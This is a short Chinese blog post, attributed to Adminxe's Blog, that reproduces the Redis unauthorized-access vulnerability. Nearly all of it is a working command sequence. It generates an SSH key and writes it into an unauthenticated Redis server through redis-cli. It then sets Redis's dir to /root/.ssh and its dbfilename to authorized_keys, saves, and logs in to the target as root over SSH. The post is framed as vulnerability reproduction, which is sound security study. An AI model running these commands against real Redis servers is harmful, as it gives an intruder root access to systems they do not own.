写入公钥
1. ssh-keygen -t rsa //执行生成key命令

2. (echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > 1.txt //将公钥写入txt

3. cat /root/.ssh/1.txt | ./redis-cli -h 192.168.0.111 -x set xxx //将.ssh目录下的公钥文件1.txt 通过redis-cli客户端写入到目标主机缓冲中

4. ./redis-cli -h 192.168.0.111 //使用客户端登录目标
config set dir /root/.ssh //设置存储公钥路径
config set dbfilename authorized_keys //设置文件名称

5. get xxx //查看缓存
save //保存缓存到目标主机路径及文件下
exit //退出

6. ssh 192.168.0.111 //成功登录

转载请注明:Adminxe's Blog » redis未授权漏洞复现-写入公钥利用